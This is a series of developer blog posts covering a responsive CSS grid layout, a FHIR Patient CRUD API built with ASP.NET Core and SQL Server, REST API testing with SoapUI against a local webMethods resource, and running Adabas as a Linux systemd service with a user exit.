section, I'll delve into the CSS code that brings this responsive grid layout to life. ### Implementing the grid layout To achieve the desired design, I'll gradually build the styling, based on each requirement. #### 1. Apply the grid layout The first step is to establish the `.product-list` as a CSS grid container: ```CSS .product-list { display: grid; } ``` At this point, the product cards will simply stack vertically, as a single column is the default behavior for a grid without explicit column definitions. #### 2. Set the minimum card width Next, I'll define the minimum card width. A value that was agreed upon during the discussion with the PO was `240px`. The CSS property for this scenario is `grid-template-columns`, which controls the number and size of columns in the grid. What value can the property take? For this case when we have a variable number of columns, we can use the **`repeat()`** function with the **`auto-fit`** value for the track count. The `auto-fit` keyword tells the grid to create as many columns as possible within the available space, respecting any minimum or maximum constraints. Then, I need to define the second argument of the `repeat()` function, which specifies the set of tracks that will be repeated. I need to have equal columns and define a minimum width for them - this will get translated into `minmax(240px, 1fr)`: - `240px` is the minimum width each column can be. It ensures that even on smaller screens, where we might only have one or two columns, the product cards will still have enough space to display their content comfortably. - `1fr` is a fractional unit, meaning that any remaining space in the grid container, after allocating the minimum width to each column, will be distributed equally among the columns. This is what creates the equal-width behavior I want. Here is the CSS for this: {% embed https://gist.github.com/cezar-plescan/de4ff6878b3d8078bc5a40eaa40619cb %} When reloading the app and adjusting the viewport size, I notice that the columns are dynamically created, have a minimum width, but there could be more than the expected 4 columns on larger screens. ![5 items per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/834qcgtxiu7p0xyxd5ye.png) #### 3. Set a maximum of 4 cards per row I need to address the issue of displaying more columns than expected on larger screens. For this I need to calculate the maximum width each column can be. For this I'll adjust the first argument of the `minmax()` function to include the maximum value of the column width. Now I have to determine what this maximum width is, relative to its parent container. I could say that the max width is 100% (the container width) / 4 (maximum columns per row) = 25%, but this is wrong because I didn't consider the gaps between the columns. Here is how I can include them: - Calculate the total width of the gaps: there are 3 gaps between 4 columns), and each gap is `1rem`, so the result is **`(4 - 1) * 1rem`** - Subtract the total gap width from the container width: `100% - (4 - 1) * 1rem` - Divide the remaining width by the number of columns: `(100% - (4 - 1) * 1rem) / 4` This is the maximum value of a column: `calc((100% - (4 - 1) * 1rem) / 4)` To make the code more flexible and maintainable, I'll use CSS variables instead of hardcoded values. Here is the updated CSS code: {% embed https://gist.github.com/cezar-plescan/9f93f7e44a73123110a358b98891c023 %} #### 4. Define a maximum width for product cards When transitioning from 2 columns to one column layout, the product card gets very wide and looks a bit odd. I want to limit its width to, let's say, 380px. This will also prevent the cards from stretching excessively on very wide screens. But where exactly should I apply this constraint? On the `.product-card` wrapper itself, or on its content? When I apply it directly on `.product-card` elements, the columns in the grid layout could overlap at different container sizes. A proper solution for this case is to apply the max width to the actual content of the `.product-card` wrapper using the flexbox display: {% embed https://gist.github.com/cezar-plescan/7d16243b376f026a24c0692055a4861c %} _**Note**: To get a deeper understanding of CSS Grid layout and its properties, you can refer to the following resources:_ - _https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_grid_layout/Basic_concepts_of_grid_layout This MDN Web Docs article provides a comprehensive overview of the fundamental concepts of CSS Grid, including grid containers, items, tracks, and lines._ - _https://developer.mozilla.org/en-US/docs/Web/CSS/grid-template-columns This MDN Web Docs article focuses specifically on the `grid-template-columns` property, explaining how it defines the columns in a grid layout._ - _https://css-tricks.com/almanac/properties/g/grid-template-columns/ This CSS-Tricks almanac entry offers a detailed explanation of grid-template-columns, including different ways to specify column sizes and examples of how to use it._ - _https://gridbyexample.com/examples/ This website provides a collection of interactive examples demonstrating various CSS Grid techniques, including responsive layouts, grid areas, and more._ #### Checkout the code The changes I've made so far can be found in the `product-list` branch of the Github repository: https://github.com/cezar-plescan/Angular-Architecture-Guide/tree/product-list. ### See it in action Here are some screenshots of different screen sizes: ![Two column per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/tegccdy4ynwjcln68i2i.png) ![Three columns per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/s6l7d2ewf7hz9a4scgz5.png) ![Four columns per row](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/houiv0lhbjozm0tv25cn.png) ## Wrapping up With the current implementation, I've successfully met the acceptance criteria for the MVP product listing page. I've established a responsive grid layout, limited the maximum card and content widths, and created a visually appealing design using Angular Material. The product list now dynamically adjusts to different screen sizes, ensuring a user-friendly experience across devices. #### Key takeaways In this article, I've laid the groundwork for the e-commerce product listing page. Here's a recap of the key points I've covered. **Topics:** - Discussed the importance of abstracting layout design and choosing the right approach (CSS Grid in our case) for responsive design. - Explored the nuances of `grid-template-columns`, `minmax()`, and other CSS properties for creating a flexible and visually appealing grid. - Deliberated on how to handle spacing, considering both the container and individual product cards. - Implemented a mobile-first design with a maximum of 4 cards per row, addressing potential issues like margin collapsing. - Set up Angular Material to enhance styling and provide pre-built components. **Architectural and Technical Decisions:** - Mobile-First Design: prioritized the mobile experience, starting with a single-column layout and planning to progressively enhance for larger screens. - CSS Grid: chose CSS Grid over Flexbox for its more powerful grid layout capabilities. - `grid-template-columns`: used `auto-fit` and `minmax` to create a responsive grid that adjusts the number of columns based on the available space. - Spacing: defined padding on the container for outer spacing and margins on the card wrappers for inner spacing. - Card styling: styled the product cards using Angular Material and added custom CSS to limit the maximum card and content width for a visually balanced layout. #### Next steps The journey of building a robust e-commerce application doesn't end here. While the core functionality is in place, there are several areas for improvement that I'll address in future iterations: - Content Overflow: I need to handle cases where product names or descriptions might be too long and overflow the card's boundaries. I'll explore strategies like truncating text or adding "Read More" functionality. - Image Optimization: Angular is currently warning us about potentially oversized images. I'll look into image optimization techniques to ensure fast loading times and a smooth user experience. - Web Accessibility: To make the product list accessible to all users, I'll follow WCAG (Web Content Accessibility Guidelines) and implement features like alternative text for images and keyboard navigation. In the next article of this series, I'll tackle these enhancements and dive deeper into the technical details of styling and refining the product list. ______ Stay tuned for more insights and practical tips as I continue to build the e-commerce application step by step!
cezar-plescan
1,917,224
FHIR crud app using aspnet core 8.0 and sql server
Hi EveryOne! I would like to discuss today, the crud operation for the patient resource using HL7 R4...
0
2024-07-13T11:35:58
https://dev.to/mannawar/fhir-crud-app-using-aspnet-core-80-and-sql-server-59p1
microsoft, hl7, sqlserver, apnetcore
Hi EveryOne! I would like to discuss today, the crud operation for the patient resource using HL7 R4 model using aspnet core and saving of patient data on sql server using EF Core. For modelling of data i have used this package. Ref- https://www.nuget.org/packages/Hl7.Fhir.R4, https://www.hl7.org/fhir/resource.html#identification Here each resource is uniquely identified by the id. I have given Id as database generated, we dont need to specifically specify that while sending request. So basically, this is my PatientEntity class. ``` public class PatientEntity { [Key] [DatabaseGenerated(DatabaseGeneratedOption.Identity)] public string Id { get; set; } = Guid.NewGuid().ToString(); [Required] public string FamilyName { get; set; } = string.Empty; [Required] public string GivenName { get; set; } = string.Empty; [Required] public string Gender { get; set; } = string.Empty; [Required] public DateTime BirthDate { get; set; } = DateTime.MinValue; public byte[]? PhotoData { get; set; } public static PatientEntity FromFhirPatient(Patient patient) { byte[]? photoData = null; if(patient.Photo != null && patient.Photo.Count > 0 && patient.Photo[0].Data != null) { photoData = patient.Photo[0].Data; } DateTime birthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue; return new PatientEntity { Id = patient.Id ?? Guid.NewGuid().ToString(), FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty, GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault()?? string.Empty, Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString(): string.Empty, BirthDate = birthDate, PhotoData = photoData }; } public Patient ToFhirPatient() { return new Patient { Id = Id, Name = new List<HumanName> { new HumanName { Family = FamilyName, Given = new List<string> { GivenName } } }, Gender = !string.IsNullOrEmpty(Gender) ? (AdministrativeGender)Enum.Parse(typeof(AdministrativeGender), Gender, true) : null, BirthDate = BirthDate.ToString("yyyy-MM-dd"), Photo = PhotoData != null ? new List<Attachment> { new Attachment { Data = PhotoData } } : null }; } ``` The properties defined above are as per HL7 R4 model and then i have defined two static methods viz. FromFhirPatient(converts a Patient object from Fhir model to PatientEntity object) and ToFhirPatient(converts a PatientEntity object to a Fhir Patient object). The details for modelling classes could be find here. we can customize accordingly. Flag `Σ` means its a modifier element, and it can change interpretation of resource, and is helpful for client to search summary only from large resource of data and helps in improving efficiency, and then there is cardinality ex.(0..1) meaning this particular field can appear minimum 0 times and maximum of 1. More details for data modelling can be find here Ref- `https://www.hl7.org/fhir/patient.html` The blow code is for configuring DbContext. ``` public class ApplicationDbContext : DbContext { public ApplicationDbContext(DbContextOptions<ApplicationDbContext> options) : base(options) { } public DbSet<PatientEntity> Patients { get; set; } protected override void OnModelCreating(ModelBuilder modelBuilder) { base.OnModelCreating(modelBuilder); } } ``` The constructor here `public ApplicationDbContext(DbContextOptions<ApplicationDbContext> options) : base(options) { }` Here ApplicationDbContext is properly configured by Dependency injection system which helps in SOC and it helps in configuring options for DbContext which typically includes things like database connection etc inside Program.cs which i will discuss next. `base(options)` passes the options parameters to the base DbContext constructor. This property `public DbSet<PatientEntity> Patients { get; set; }` creates a table inside database ModelBuilder class provides API surface for configuring a DbContext to map entities to db schema. This is my Program class ``` using Hl7.Fhir.Model; using Hl7.Fhir.Serialization; using Microsoft.EntityFrameworkCore; using NetCrudApp.Data; using System.Text.Json.Serialization; var builder = WebApplication.CreateBuilder(args); builder.Services.AddControllers() .AddJsonOptions(opt => { IList<JsonConverter> fhirConverters = opt.JsonSerializerOptions.ForFhir(ModelInfo.ModelInspector).Converters; IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters); foreach(JsonConverter fhirConverter in convertersToAdd) { opt.JsonSerializerOptions.Converters.Add(fhirConverter); } opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping; }); var connectionString = builder.Configuration.GetConnectionString("DefaultConnection"); builder.Services.AddDbContext<ApplicationDbContext>(options => { options.UseSqlServer(connectionString); }); builder.Services.AddEndpointsApiExplorer(); builder.Services.AddSwaggerGen(); builder.Services.AddHttpClient(); // added this line to converse with fhir server microsoft var app = builder.Build(); // Configure the HTTP request pipeline. if (app.Environment.IsDevelopment()) { app.UseSwagger(); app.UseSwaggerUI(); } app.UseHttpsRedirection(); app.UseAuthorization(); app.MapControllers(); using (var scope = app.Services.CreateScope()) { var dbContext = scope.ServiceProvider.GetRequiredService<ApplicationDbContext>(); await dbContext.Database.MigrateAsync(); } app.Run(); ``` Here, in this line ``` IList<JsonConverter> fhirConverters = opt.JsonSerializerOptions.ForFhir(ModelInfo.ModelInspector).Converters; IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters); foreach(JsonConverter fhirConverter in convertersToAdd) { opt.JsonSerializerOptions.Converters.Add(fhirConverter); } opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping; ``` is required for Serialization of data, otherwise this will throw error `The collection type 'Hl7.Fhir.Model.Patient' is abstract, an interface, or is read only, and could not be instantiated and populated.` Also, we need to initialize a new converter as `IList<JsonConverter> convertersToAdd = new List<JsonConverter>(fhirConverters);` else we will end up in modifying the original list which is not of course we want. Also, this line `opt.JsonSerializerOptions.Encoder = System.Text.Encodings.Web.JavaScriptEncoder.UnsafeRelaxedJsonEscaping;` allows characters that are particularly escaped like &, <, > to remain unescaped, which is useful for interoperability and readability of json output but it should be cautiously used. In summary this converter is used for serialization and deserialization of fhir model data which is of complex type and is challenging to perform **deserialization** for saving data on database and ** serializing** while returning response to client using native converters like NewtonSoft. Ref here - `https://github.com/FirelyTeam/firely-net-sdk/issues/2583` This line ``` var connectionString = builder.Configuration.GetConnectionString("DefaultConnection"); builder.Services.AddDbContext<ApplicationDbContext>(options => { options.UseSqlServer(connectionString); }); ``` specifies the connection string for the app which is defined inside appSetting.json. For simplicity sake i have just defined the variables inside my appsettings.json as below as we are developing is using local sql server only. For azure deployment, we can configure services to manage secrets properly. appsettings.json is as below, it simply specifies the connection string and logging level, if we want more info from logging just change from `warning` to `Information` inside appsettings.json or appsettings.Development.json ``` { "Logging": { "LogLevel": { "Default": "Information", "Microsoft.AspNetCore": "Warning" } }, "AllowedHosts": "*", "ConnectionStrings": { "DefaultConnection": "Server=.;Database=FhirLocalDb;Integrated Security=true;TrustServerCertificate=true;" } } ``` Further, this line inside Program.cs ``` using (var scope = app.Services.CreateScope()) { var dbContext = scope.ServiceProvider.GetRequiredService<ApplicationDbContext>(); await dbContext.Database.MigrateAsync(); } ``` is used to apply any pending migration. But before that we need to add migration and update database using below commands. ``` dotnet ef migrations add InitialCreate dotnet ef database update ``` Next, this is my PatientController class ``` [Route("fhir/patient")] [ApiController] public class PatientResourceProvider : ControllerBase { private readonly ApplicationDbContext _context; public PatientResourceProvider(ApplicationDbContext context) { _context = context; } [HttpGet("{id}")] public async Task<IActionResult> GetPatient(string id) { try { //https://stackoverflow.com/questions/62899915/converting-null-literal-or-possible-null-value-to-non-nullable-type PatientEntity? patientEntity = await _context.Patients.FindAsync(id); if(patientEntity != null) { return Ok(patientEntity); }else { return NotFound(new { Message = "Patient not found" }); } }catch(FhirOperationException ex) when (ex.Status == System.Net.HttpStatusCode.NotFound) { return NotFound(new { Message = "Patient not found" }); }catch(Exception ex) { return StatusCode(500, new { Message = "Ann error occurred", Details = ex.Message }); } } [HttpPost] public async Task<IActionResult> CreatePatient([FromBody] Patient patient) { using var transaction = await _context.Database.BeginTransactionAsync(); try { if (!ModelState.IsValid) { return BadRequest(ModelState); } PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient); _context.Patients.Add(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync(); return CreatedAtAction(nameof(GetPatient), new { id = patientEntity.Id }, patientEntity.ToFhirPatient()); } catch (Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } [HttpPut("{id}")] public async Task<IActionResult> UpdatePatient(string id, [FromBody] Patient patient) { if(id == null) { return BadRequest(new {Message = "Patient id cannot be null"}); } using var transaction = await _context.Database.BeginTransactionAsync(); try { PatientEntity? patientEntity = await _context.Patients.FindAsync(id); if(patientEntity == null) { return NotFound(new { Message = "Patient not found" }); } if(patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family)) { return BadRequest(new { Message = "Patient name is required" }); } patientEntity.FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty; patientEntity.GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault() ?? string.Empty; patientEntity.Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString().ToLower() : string.Empty; patientEntity.BirthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue; _context.Entry(patientEntity).State = EntityState.Modified; await _context.SaveChangesAsync(); await transaction.CommitAsync(); return NoContent(); }catch(DbUpdateConcurrencyException) { if(!_context.Patients.Any(e => e.Id == id)) { return NotFound(new { Message = "Patient not found" }); } else { throw; } }catch(Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } [HttpDelete("{id}")] public async Task<IActionResult> DeletePatient(string id) { using var transaction = await _context.Database.BeginTransactionAsync(); try { var patientEntity = await _context.Patients.FindAsync(id); if(patientEntity == null) { return NotFound(new { Message = "Patient not found" }); } _context.Patients.Remove(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync(); return NoContent(); }catch(Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } [HttpGet("search")] public async Task<IActionResult> SearchPatient([FromQuery] string? name = null, string? id = null) { try { IQueryable<PatientEntity> query = _context.Patients; if (!string.IsNullOrEmpty(name)) { query = query.Where(n => n.FamilyName == name || n.GivenName == name); } if (!string.IsNullOrEmpty(id)) { query = query.Where(p => p.Id == id); } var patients = await query.ToListAsync(); if (!patients.Any()) { return NotFound(new { Message = "No Patient found" }); } return Ok(patients); }catch(Exception ex) { return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } } ``` Starting from Post request as below. ``` [HttpPost] public async Task<IActionResult> CreatePatient([FromBody] Patient patient) { using var transaction = await _context.Database.BeginTransactionAsync(); try { if (!ModelState.IsValid) { return BadRequest(ModelState); } PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient); _context.Patients.Add(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync(); return CreatedAtAction(nameof(GetPatient), new { id = patientEntity.Id }, patientEntity.ToFhirPatient()); } catch (Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } ``` We start writing defensively to catch any errors, first database transaction is started asynchronously to maintain integrity of data saved on sql server. If any parts fails here it will Rollback the transaction. Then here `if (!ModelState.IsValid) { return BadRequest(ModelState); }` model state is verified as per the attributes and rules defined inside Patient model class, if there is model validation error it will throw 400. Then this line of code `PatientEntity patientEntity = PatientEntity.FromFhirPatient(patient);` will **deserialize** data from entity class in order to save data on database. These three lines `_context.Patients.Add(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync();` will add new patient based upon request from body and save in db and commit transaction. If any error is thrown transactionwill be rolled back here `await transaction.RollbackAsync(); ` and in case of any error it will be catched inside catch block. The successful post request in postman would look something like this. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8p956z1jtb4tbzuezz3o.png) Similarly, for get request here ``` [HttpGet("{id}")] public async Task<IActionResult> GetPatient(string id) { try { PatientEntity? patientEntity = await _context.Patients.FindAsync(id); if(patientEntity != null) { return Ok(patientEntity); }else { return NotFound(new { Message = "Patient not found" }); } }catch(FhirOperationException ex) when (ex.Status == System.Net.HttpStatusCode.NotFound) { return NotFound(new { Message = "Patient not found" }); }catch(Exception ex) { return StatusCode(500, new { Message = "Ann error occurred", Details = ex.Message }); } } ``` We first try to find a given entity using primary id here `PatientEntity? patientEntity = await _context.Patients.FindAsync(id);` Here **PatientEntity?** question mark is used in order to ward off `warning CS8600 Converting null literal or possible null value to non-nullable type.` If patientEntity is not null, then a matching patientEntity is returned from db here using response as `return Ok(patientEntity);` else the errors are catched inside catch blocks. **FhirOperationException** is derived from base Exception class and it represents HL7 FHIR errors that occur during application execution. Successful, Postman request for get request is as below. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/t6ye19p11bigne43j5v4.png) Likewise, for put operation here ``` [HttpPut("{id}")] public async Task<IActionResult> UpdatePatient(string id, [FromBody] Patient patient) { if(id == null) { return BadRequest(new {Message = "Patient id cannot be null"}); } using var transaction = await _context.Database.BeginTransactionAsync(); try { PatientEntity? patientEntity = await _context.Patients.FindAsync(id); if(patientEntity == null) { return NotFound(new { Message = "Patient not found" }); } if(patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family)) { return BadRequest(new { Message = "Patient name is required" }); } patientEntity.FamilyName = patient.Name.FirstOrDefault()?.Family ?? string.Empty; patientEntity.GivenName = patient.Name.FirstOrDefault()?.Given.FirstOrDefault() ?? string.Empty; patientEntity.Gender = patient.Gender.HasValue ? patient.Gender.Value.ToString().ToLower() : string.Empty; patientEntity.BirthDate = patient.BirthDateElement?.ToDateTimeOffset()?.DateTime ?? DateTime.MinValue; _context.Entry(patientEntity).State = EntityState.Modified; await _context.SaveChangesAsync(); await transaction.CommitAsync(); return NoContent(); }catch(DbUpdateConcurrencyException) { if(!_context.Patients.Any(e => e.Id == id)) { return NotFound(new { Message = "Patient not found" }); } else { throw; } }catch(Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } ``` First, null check of id is done which is found inside query parameter of request url and then to update the given property is locked using this block as in post request to maintain data integrity inside db here `using var transaction = await _context.Database.BeginTransactionAsync();` Here in this line ` if(patientEntity == null) { return NotFound(new { Message = "Patient not found" }); }` if patient with given id is not found, then 404 not found is returned as response with its according message. Here ` if(patient.Name == null || patient.Name.Count == 0 || string.IsNullOrEmpty(patient.Name[0].Family)) { return BadRequest(new { Message = "Patient name is required" }); }` it validates the Patient incoming object. And it checks if Name property of patient object is null or if Name count is zero or if the family Name of the first HumanName is empty or null will throw 400 validation error as below. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/93m9xzy3fgg5s5p0ylaq.png) Here, in these four lines FamilyName, GivenName, Gender and BirthDate are mapped to either the values provided by the client or else will be mapped to empty string. Only, BirthDate is first converted to DateTimeOffset and then to DateTime and if conversion fails or is null then it assigns DateTime.MinValue; This line `_context.Entry(patientEntity).State = EntityState.Modified;` marks the patient entity to be modified and tells EF core that **patientEntity** has been modified and needs to be updated in database. And another two lines here ` await _context.SaveChangesAsync(); await transaction.CommitAsync();` save changes in database and commit transaction and returns 204 no content. Else the error is catched inside catch block. Successful postman request is ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/zuvxqigvbwirc5z6ywsa.png) Note- We use Patient model as method parameter here since we have to adhere to HL7 Fhir model. Further, delete method is also locked inside database transaction as well in order to maintain data integrity ``` [HttpDelete("{id}")] public async Task<IActionResult> DeletePatient(string id) { using var transaction = await _context.Database.BeginTransactionAsync(); try { var patientEntity = await _context.Patients.FindAsync(id); if(patientEntity == null) { return NotFound(new { Message = "Patient not found" }); } _context.Patients.Remove(patientEntity); await _context.SaveChangesAsync(); await transaction.CommitAsync(); return NoContent(); }catch(Exception ex) { await transaction.RollbackAsync(); return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } ``` First patient is searched using id and then if patient with given id is found then this line `_context.Patients.Remove(patientEntity);` will successfully remove patientEntity from db only when this line `await _context.SaveChangesAsync();` is executed and transaction is complete and if there is any error, the transaction will be rolled back and error message is displayed accordingly. Successful postman request for this operation is as here. ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/p5h0ig95lyy0khie2u3c.png) And the Search operation is by id or by name as here. ``` [HttpGet("search")] public async Task<IActionResult> SearchPatient([FromQuery] string? name = null, string? id = null) { try { IQueryable<PatientEntity> query = _context.Patients; if (!string.IsNullOrEmpty(name)) { query = query.Where(n => n.FamilyName == name || n.GivenName == name); } if (!string.IsNullOrEmpty(id)) { query = query.Where(p => p.Id == id); } List<PatientEntity> patients = await query.ToListAsync(); if (!patients.Any()) { return NotFound(new { Message = "No Patient found" }); } return Ok(patients); }catch(Exception ex) { return StatusCode(500, new { Message = "An error occurred", Details = ex.Message }); } } ``` Since, we are directly interacting with database here that's why i have used `IQueryable<PatientEntity> query = _context.Patients;` **PatientEntity** type instead of Patient type. Then null and empty string check operation is performed for both id and name and the results are filtered using Where extension method. This line `List<PatientEntity> patients = await query.ToListAsync();` results a list of patients matching the records from db and if any error it will be catched inside catch block. Successful postman request is as below. **Search by name** ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/nh5bj15yea4rwtnbmt74.png) Search by id ![Image description](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/claaap7ler9cxvmfmznr.png) You can close use/play with below github. No permission is required. In case of any issue feel free to message me i will try to respond asap! Repo- https://github.com/mannawar/fhir-msft-sqlserver Thanks for your time!
mannawar
1,917,269
REST API Client - Testing a provided API
Introduction This section explains how to test an API application using a Rest API client...
0
2024-07-09T12:14:11
https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1
api, restapi, adabas
--- title: REST API Client - Testing a provided API published: true date: 2024-06-14 17:41:07 UTC tags: api, restapi, adabas canonical_url: https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1 --- ## Introduction This section explains how to test an API application using a Rest API client (e.g. SoapUi and Postman). In our case we will use SoapUI as Rest API client. ![Overview_components_APIClient](https://global.discourse-cdn.com/techcommunity/original/3X/1/5/15801e9c8f11ed83c41cfda048e25f00fdf3868a.png) **The following topic modules are considered in more detail in this tutorial:** 1. Change Resource Configurations 2. Testing in SoapUI ## Change Resource Configurations Switch to the Service Development perspective and refresh (F5 → Right click on a package and select refresh) the Package Navigator view. To customize Resource Configurations, click on the desired resource. Then you can edit Rest resources (e.g. Supported HTTP methods). To do this, select a resource from the list and click edit. ![change resource configurations](https://global.discourse-cdn.com/techcommunity/original/3X/3/3/3363abd5a4c6df218a8f309100e2393f0a1514d6.png) Now you can specify for example which http methods should be supported. ![Edit REST Resource Operation](https://global.discourse-cdn.com/techcommunity/original/3X/b/5/b547f0a495ce637da44f5b10d42d5f329ca7860b.png) ## Testing a provided API To perform an instant test, launch SOAP UI from the Windows Start menu. Then select File and New REST Project. [![New REST Project](https://global.discourse-cdn.com/techcommunity/original/3X/8/3/834c8ae77158857197ee7146990bf7490244d60c.png)](https://global.discourse-cdn.com/techcommunity/original/3X/8/3/834c8ae77158857197ee7146990bf7490244d60c.png "New REST Project") Provide [http://localhost:5555/restv2/Resourcename/Programname](http://localhost:5555/restv2/Resourcename/Programname) as initial REST service URI and click OK. ![provide URI](https://global.discourse-cdn.com/techcommunity/original/3X/1/d/1d795ca1d8003822c63ffeedf537b5b58915046b.png) You can also copy the URI from the resource in the service development perspective. To do this, open the corresponding resource and look in the properties and resource configurations. ![Resource properties](https://global.discourse-cdn.com/techcommunity/original/3X/c/1/c17e610b58a7fbf06e744c78e16db31fbce616a6.png) ![Resource configurations](https://global.discourse-cdn.com/techcommunity/original/3X/b/e/be48a4ce72cd0f9241d47fd8f0af40990629747e.png) In the Navigator, now rename the generated REST project (e.g. REST Employees), the method (in our case Employees) and rename the generate request (in our case Employees). ![Navigator - renaming](https://global.discourse-cdn.com/techcommunity/original/3X/c/4/c4fae1eaa50f5dc991594a37a4a52a33a922f60f.png) Then double-click the generated request in the Navigator and provide the following parameters for the REST request: - Mehtodtype: GET - Request properties tab - Username: Administrator - Password: manage - Request header - Request header (click on headers to add a header name): Accept - Request header value: application/json **Methodtype:** ![Methodtype](https://global.discourse-cdn.com/techcommunity/original/3X/d/a/dad6cb5f4c2097ac0f276e289180bf13f76d7a1c.png) **Username + password:** ![password and username](https://global.discourse-cdn.com/techcommunity/original/3X/c/e/ced426e2b6b08c8c41f7c2f6e3792198dd4b4cbf.png) **Request header:** 1. Add HTTP Header: ![add http header](https://global.discourse-cdn.com/techcommunity/original/3X/6/2/62b52c07f4b3d8f7b326321d6889ef4c78cca092.png) 2. Enter header value: ![add header value](https://global.discourse-cdn.com/techcommunity/original/3X/f/c/fcd76f7f6f1ca47643f9305b03cf0f820159a57c.png) If you have entered all the parameters just mentioned click on the green arrow ![Submit request](https://global.discourse-cdn.com/techcommunity/original/3X/4/0/409ca43c645d4eec8c7848c0dc525a21c5860a70.png) to submit the request. Open tab Raw of the response to see the HTTP response code. In case of success (200), the REST service should return a list of employees in JSON format. Therefore switch to the JSON tab of the response. ## Conclusion: Most Important Facts - Rest API Clients: SoapUI, Postman, etc. - The following parameters must be adjusted for the REST request before starting it - **Method:** GET - **Username:** Administrator + **Password:** manage - **Request Header:** Accept + **Request Header value:** application/json With this tutorial you have successfully completed our series and have a better overview of how the various Software AG (Adabas, Natural, NaturalOne, EntireX, webMethods) products work together on the topic of API. Now you can try out the things you have learned yourself. Have fun! [Read full topic](https://tech.forums.softwareag.com/t/rest-api-client-testing-a-provided-api/268250/1)
techcomm_sag
1,917,278
How to activate Adabas as a service in LINUX, if the database has a user exit defined?
Introduction When configuring Adabas as a service in Linux, you may encounter challenges...
0
2024-07-09T12:17:29
https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1
adabas, linux, database, guide
--- title: How to activate Adabas as a service in LINUX, if the database has a user exit defined? published: true date: 2024-06-04 08:52:13 UTC tags: adabas, linux, database, guide canonical_url: https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1 --- ## Introduction When configuring Adabas as a service in Linux, you may encounter challenges related to user exits. In this guide, we’ll explore the steps to activate Adabas as a service while considering user exits. (In this case, uex4). ## Pre-requisites | Product | Adabas | | --- | --- | | Versions | 7.0.1, 7.1.1, 7.2, 7.3 | | Platforms | Linux and Cloud | ## Problem You may encounter such an issue by creating a daemon (as example db012.service) with the command: `create_systemd_service_file.sh 012 sag` and starting the database as a service with: `systemctl start db012` ## Cause If the adanuc.log entries include “shared library ADAUEX\_4, path name () could not be loaded” and “invalid environment variable” error messages, it implies difficulties in starting the database as a service, with a user exit defined. Setting the environment variable ADAUEX\_4 in a command shell is not adequate when the database is configured as a systemd service. To solve this stumbling block, define an entry in the DBXXX.INI file of the database in the [ENVIRONMENT] section. The inability to start a database with a user exit defined could manifest in the form of loading errors in the shared library ADAUEX\_4. ## Resolution Setting the environment variable ADAUEX\_4 in a command shell is not sufficient when a database is configured as a systemd service. [Read the full topic here](https://tech.forums.softwareag.com/t/how-to-activate-adabas-as-a-service-in-linux-if-the-database-has-a-user-exit-defined/296443/1) and find out what is the possible solution.
techcomm_sag
1,917,507
Azure Synapse Analytics Security: Access Control
Introduction The assets of a bank are only accessible to some high-ranking officials, and...
0
2024-07-14T12:40:32
https://dev.to/ayush9892/azure-synapse-analytics-security-access-control-4chl
azure, dataengineering, sqlserver, database
